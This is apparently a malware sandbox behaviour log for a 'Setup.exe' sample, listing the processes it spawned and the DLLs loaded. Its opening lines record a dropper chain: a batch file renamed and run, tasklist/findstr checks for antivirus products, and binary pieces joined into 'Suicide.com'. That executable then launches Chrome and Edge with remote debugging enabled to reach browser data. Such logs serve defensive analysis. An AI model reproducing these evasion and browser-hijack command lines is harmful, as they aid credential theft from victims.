Source: C:\Users\Public\Desktop\Setup.exe	Process created: C:\Users\user\AppData\Local\Temp\lem.exe C:\Users\user\AppData\Local\Temp\lem.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lem.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Premium Premium.cmd && Premium.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 402438	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "integratedintlhandlingwaterproofcbperformtreasurertim" Recording	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Coaches + ..\Hypothetical + ..\Nasty + ..\Fly + ..\Zum + ..\Disclose + ..\Expensive + ..\Argue N	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\402438\Suicide.com Suicide.com N	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2296,i,7454184936104441568,15568927826006656049,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\Setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: lpk.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msihnd.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msihnd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
